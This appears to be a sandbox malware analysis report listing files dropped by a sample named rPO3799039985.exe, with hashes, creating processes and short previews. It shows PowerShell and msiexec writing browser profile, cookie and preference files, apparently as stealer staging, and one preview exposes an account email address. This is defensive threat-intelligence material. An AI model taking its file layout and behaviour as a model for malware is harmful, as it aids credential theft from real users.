                                                                                                                                                                                                        SSDEEP:12288:NiNbeGX4+5+aeLJOwLqgUf5/G2ywJCfANIsCssyKBsFLL+Wlra97H6Vy:ib9l+PMxgGJGhs0iLaWl8ac
                                                                                                                                                                                                        MD5:EFB9125831992267D27C5DD9A2BDC0BE
                                                                                                                                                                                                        SHA1:0BE2E44632121C8FC2F325ED4AF6B91E49486711
                                                                                                                                                                                                        SHA-256:7028C43EDB1ED93FEE2D535A938B07A687D01CF5A5E4DC9E9104D5FA372089CA
                                                                                                                                                                                                        SHA-512:B3BA5A31A5012907853CEF9EE1BC2AEFBB084BE4DFAB095B695065DC1BD460546B7FBCE10788010168977562D5A859C471DAC44C712B5EFA3F0D60CB6CCF1383
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L....{.W.................`...|.......1.......p....@..........................@............@.................................4u..........0U...........................................................................p...............................text...._.......`.................. ..`.rdata..R....p.......d..............@..@.data....T...........x..............@....ndata...................................rsrc...0U.......V...~..............@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\rPO3799039985.exe:Zone.Identifier

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\smerks.txt

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\rPO3799039985.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):412
                                                                                                                                                                                                        Entropy (8bit):4.192391163281544
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:r1J7RVPufFanmnm3ulNjE65HjVvldXe2JlD+n:hJHVot5HxvdJU
                                                                                                                                                                                                        MD5:E66E7200CCD685911F937E28961D75D0
                                                                                                                                                                                                        SHA1:1997901649D7A072B1EBA65066061723BCBCD761
                                                                                                                                                                                                        SHA-256:7A07CF9CE7D37DB2AD4E85FEE76E5768F4CEDD9FC585A1FBC21A45D842E2A4FE
                                                                                                                                                                                                        SHA-512:D5F414584F9898AD2DB87913CEA866CB6864128CD36A9279B7C257B4F2EBAA760DD41FE3E6ADABF50BC029C74EA8D4A140CBA8DC2BA93F6BB86B5EA9D6195337
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:haders menneskealders nulvksten.bramraas skovlingers djvlens vinperse.ledertillggene metodiks initieredes,monger udspecificeringernes annbeths countertail siennas argentine risikablere maltha autocystoplasty kontaktformidlingens skraafladen..julestuernes liparomphalus cogging holmgangenes centrumdemokraternes,presentationes entocele ndtrftig transportegenskaber containerization spotlysenes incommensurateness,

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\stegegryden.cha

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\rPO3799039985.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):205374
                                                                                                                                                                                                        Entropy (8bit):1.2643137219362226
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:AOXyjqFZGYEmKWu77kfudkFtMlfqrig3OkyuW/+fNbPwKQCzGYgzEV9VV1A0jorK:rmbjPy81NzWXwSGqpN
                                                                                                                                                                                                        MD5:B990C3EB94E6AC09E8DCC7E60F906681
                                                                                                                                                                                                        SHA1:5CA18F4310F4C727FD171ED5FBDE72F961ECE459
                                                                                                                                                                                                        SHA-256:506BBA53D913CEB7832495190229754A1B3C50937DB22A2D0B4C2EB58BF34F82
                                                                                                                                                                                                        SHA-512:57DEA1BA990F56BC66501A30EBA4CE3815186240A7879C7C939C3F0A2DDE28FE53420F956EF2FBE059197F203EC041686A9E31EF003A08E3DDBE6575A988DEB3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:..........k..................................................;......................................................8..............................................................................................................m...........................3....................;......................L.......................................c.........J..............r.....................................................q................T..................................`...................u.............................................................................................."..........................................................................................b...................... ....\................................/.................................................................................................+.....................................................V.......................|.............................................w....................... ...............

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TmpUserData\0ee15397-7420-4031-acc8-e52d0c346b9e.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14979
                                                                                                                                                                                                        Entropy (8bit):5.632850769444258
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:L9iIuERzA83h09RZxeIu9J8y9CIKf+qNrB:gIuERzA83h09RZx4J8y9CIKfHNd
                                                                                                                                                                                                        MD5:75BEAFF7B14E1136FF76F2910615BF55
                                                                                                                                                                                                        SHA1:645E290D2A3C65EC2D3BB48CB1744CC4824B24F7
                                                                                                                                                                                                        SHA-256:50687C335EC2E6A88480460B348009CC87BEA5230928792160DF425FAE1384DD
                                                                                                                                                                                                        SHA-512:3A4519A49664A258305604B7140FE52F25E9E972A002CB1AC7D3C5A65C1FA1FA43256739AE65A7AC786B4F33D2D6464B8578B654282727E4AA21755D15418C1A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TmpUserData\16dd34ca-d3be-44e2-8080-a51176d88610.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14979
                                                                                                                                                                                                        Entropy (8bit):5.632850769444258
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:L9iIuERzA83h09RZxeIu9J8y9CIKf+qNrB:gIuERzA83h09RZx4J8y9CIKfHNd
                                                                                                                                                                                                        MD5:75BEAFF7B14E1136FF76F2910615BF55
                                                                                                                                                                                                        SHA1:645E290D2A3C65EC2D3BB48CB1744CC4824B24F7
                                                                                                                                                                                                        SHA-256:50687C335EC2E6A88480460B348009CC87BEA5230928792160DF425FAE1384DD
                                                                                                                                                                                                        SHA-512:3A4519A49664A258305604B7140FE52F25E9E972A002CB1AC7D3C5A65C1FA1FA43256739AE65A7AC786B4F33D2D6464B8578B654282727E4AA21755D15418C1A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TmpUserData\369484a2-1c9d-4f7b-bc22-ea54d97b97a3.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14977
                                                                                                                                                                                                        Entropy (8bit):5.632671613624406
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:L9iIuERzA83h09RZxeIu968y9CIKf+qNrB:gIuERzA83h09RZx468y9CIKfHNd
                                                                                                                                                                                                        MD5:9B8F148E46E9BCBE8D62C34081F052E7
                                                                                                                                                                                                        SHA1:474537195126F2873F48183357BFBB01E3C30F23
                                                                                                                                                                                                        SHA-256:200A88987C6EF66CF289A7AB2C0B31CA8FE9CFF110A0300C4B7C09C16DD70C7A
                                                                                                                                                                                                        SHA-512:A5BD35C1A4F879CD7500F1ABBEA53950128EF3E1B8417668C27D52F1107AABECA8FA9CE0BEA79AF4C9DCBCAF7227374EDA2C10846A6816C37878CD1D0A14A7A1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TmpUserData\BrowserMetrics\BrowserMetrics-6731AE0E-FA8.pma

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                        Entropy (8bit):0.03142918454149101
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:zWbe2PWxhemgvKxKhrmNEv+tD5uMSIePW1hJk+Dzdn8y08Tcm2RGOdBx:zWCAhC9R5uMOPGhW+D508T2RGOD
                                                                                                                                                                                                        MD5:3C4B8ECA46360D10D11772C674677C00
                                                                                                                                                                                                        SHA1:236E47FCF1CAF4A8E3B67D118544CB1545B3B1FE
                                                                                                                                                                                                        SHA-256:EAC885318BBE7E94180741A6FA0F724FF4A647009020D269E6D10659D1822243
                                                                                                                                                                                                        SHA-512:471346A7DA69AD939B2D188DD42486BE8690C18FC869E6FB083502A1EED576D8DD1AD8A67860D3A96C6A7CEDAEDAA3057FF2454F9C48EC5E9B8FB0BAAA65C949
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:...@..@...@.....C.].....@................L...L..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0......C<>.Z...................C<>.Z..................UMA.PersistentHistograms.DriveType......8...i.y.[".................................................i.y..Yd........A...........................7o.I'.Y.".4.............8o.I'.Y.................UMA.PersistentHistograms.HistogramsInStartupFile........ ...i.y.......7o.I'.Y..C<>.... ...i.y.......7o.I'.Y.7o.I........i.y..Yd........A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.........i.y.Pq.3................94.0.992.31-64".en-US*...Windows NT..10.0.1904224..x86_64..|.......".To Be Filled By O.E.M....x86_64:F..variations_seed_etag.."mOB9Fluqaq+mietxhYXSL2cAH0KxdzECs1csHpZVA18="P....5...............4.>.2...:..............0..,.......TelemetryPopSampleSampling......Default.................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3045002, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                        Entropy (8bit):1.4026573159402624
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TB9aw/aHLopFMavU1/iB8eVC+rQ88TkQqp8JHyDlEKw0esEieNp:1PareMa8K8eVC+rZ8TkQqpWSDlNufp
                                                                                                                                                                                                        MD5:F49DFF163167A43F4940B7337A092C07
                                                                                                                                                                                                        SHA1:1A8BAAC92537FA0BD39063D17C3072AD86190CC4
                                                                                                                                                                                                        SHA-256:B3D38278030DBEA9D1CDDC177F9B6CB590CE1D383A88211B231402B7CA208CF3
                                                                                                                                                                                                        SHA-512:BC7685763D70300FE2AE28803D9F886D91004F6045A995065FAAEB6A9DFCAB77E80B475516E9B4C1F8969E112E2B48C7E68FC2AB15F61BB69443A8C54E24066F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................v.......@..g.....@....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):28481
                                                                                                                                                                                                        Entropy (8bit):5.673738414711985
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:IeolWTv8F1+UoAYDCx9Tuqh0VfUC9xbog/OVILlDPrUStvIl:IeolWTvu1jaVLqSM
                                                                                                                                                                                                        MD5:05B3EA38D4AC2D106219222D8470E758
                                                                                                                                                                                                        SHA1:1464C06668DBB41744BFA94BD78FCDE000679F27
                                                                                                                                                                                                        SHA-256:EEAD25E8C98A5010426D5189CECBE187AD7D6B0375316795A0C09312198CF12C
                                                                                                                                                                                                        SHA-512:FF73AE245EACDF1599809DCE42879A88D3DF7A5AC6B7E525EECC2B9FE4F36C24E25A1228807AAE1AAC05C0BCB38182D6A5EF82650DC454BE4F1C485EB1E0ACFC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"edge":{"services":{"account_id":"000340011677ED77","last_account_id":"000340011677ED77","last_username":"shahak.shapira@outlook.com"}},"extensions":{"settings":{"ampmimodbocknpfehkbdjolnnbongejb":{"state":1},"dgiklkfkllikcanfonkcabmbdfmgleag":{"active_permissions":{"api":[],"manifest_permissions":[]},"commands":{},"content_settings":[],"creation_flags":1,"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13275099748198646","location":5,"manifest":{"content_capabilities":{"include_globs":["https://*excel.officeapps.live.com/*","https://*onenote.officeapps.live.com/*","https://*powerpoint.officeapps.live.com/*","https://*word-edit.officeapps.live.com/*","https://*excel.partner.officewebapps.cn/*","https://*onenote.partner.officewebapps.cn/*","https://*powerpoint.partner.officewebapps.cn/*","https://*word-edit.partner.officewebapps.cn/*","https://*excel.gov.online.office365.us/*","https://*onenote.gov.online.office365.u

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TmpUserData\GrShaderCache\GPUCache\data_0

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8192
                                                                                                                                                                                                        Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsFl:/F
                                                                                                                                                                                                        MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                        SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                        SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                        SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TmpUserData\GrShaderCache\GPUCache\data_1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TmpUserData\GrShaderCache\GPUCache\data_2

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8192
                                                                                                                                                                                                        Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                        MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                        SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                        SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                        SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TmpUserData\GrShaderCache\GPUCache\data_3

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8192
                                                                                                                                                                                                        Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                        MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                        SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                        SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                        SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TmpUserData\GrShaderCache\GPUCache\index

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:FoxPro FPT, blocks size 512, next free block index 3284796353, field type 0
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):262512
                                                                                                                                                                                                        Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:LsFl0lejRP/t:LsFKetP/t
                                                                                                                                                                                                        MD5:9EE030F215E7AA96872F7C76AB1BB3E1
                                                                                                                                                                                                        SHA1:1BB26758E48F3EAB2779C2C5D1BA41EAB7133A3B
                                                                                                                                                                                                        SHA-256:D15CFA3F5A78701FE2E8A93F5329153E5D91847D671CF5F9B304D9DAED8521C2
                                                                                                                                                                                                        SHA-512:C84BB22FB9F7C476459577B25A4D39B152872070F5536E871B9B6A7E47D0C322D9473D70D5BF95921191B2E88F46978AE0DE08B1F643E59FFF4A9CFD0D0AA256
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:............................................4./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TmpUserData\Local State

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):15119
                                                                                                                                                                                                        Entropy (8bit):5.63468773874796
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:L9iIuERzA83h09RZxeI4bO8y8eIKf+qNV:gIuERzA83h09RZxwO8y8eIKfHNV
                                                                                                                                                                                                        MD5:AFC16C019BBEB3904B37576B9179D9CD
                                                                                                                                                                                                        SHA1:DBA86847FFE7AD2E887F1A51FBD464357850488D
                                                                                                                                                                                                        SHA-256:8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
                                                                                                                                                                                                        SHA-512:752C02768963163D8D20219FEB7A83C2EEAC6C4B5E7F97B035815334B7BB6D327053FA089410BA6D2328B85B9A464F651945F60AD36BD822D1E54E31434C5875
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TmpUserData\Local State~RFdbff94.TMP (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):15119
                                                                                                                                                                                                        Entropy (8bit):5.63468773874796
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:L9iIuERzA83h09RZxeI4bO8y8eIKf+qNV:gIuERzA83h09RZxwO8y8eIKfHNV
                                                                                                                                                                                                        MD5:AFC16C019BBEB3904B37576B9179D9CD
                                                                                                                                                                                                        SHA1:DBA86847FFE7AD2E887F1A51FBD464357850488D
                                                                                                                                                                                                        SHA-256:8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
                                                                                                                                                                                                        SHA-512:752C02768963163D8D20219FEB7A83C2EEAC6C4B5E7F97B035815334B7BB6D327053FA089410BA6D2328B85B9A464F651945F60AD36BD822D1E54E31434C5875
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TmpUserData\Local State~RFdc2c51.TMP (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):15119
                                                                                                                                                                                                        Entropy (8bit):5.63468773874796
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:L9iIuERzA83h09RZxeI4bO8y8eIKf+qNV:gIuERzA83h09RZxwO8y8eIKfHNV
                                                                                                                                                                                                        MD5:AFC16C019BBEB3904B37576B9179D9CD
                                                                                                                                                                                                        SHA1:DBA86847FFE7AD2E887F1A51FBD464357850488D
                                                                                                                                                                                                        SHA-256:8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
                                                                                                                                                                                                        SHA-512:752C02768963163D8D20219FEB7A83C2EEAC6C4B5E7F97B035815334B7BB6D327053FA089410BA6D2328B85B9A464F651945F60AD36BD822D1E54E31434C5875
                                                                                                                                                                                                        Malicious:false
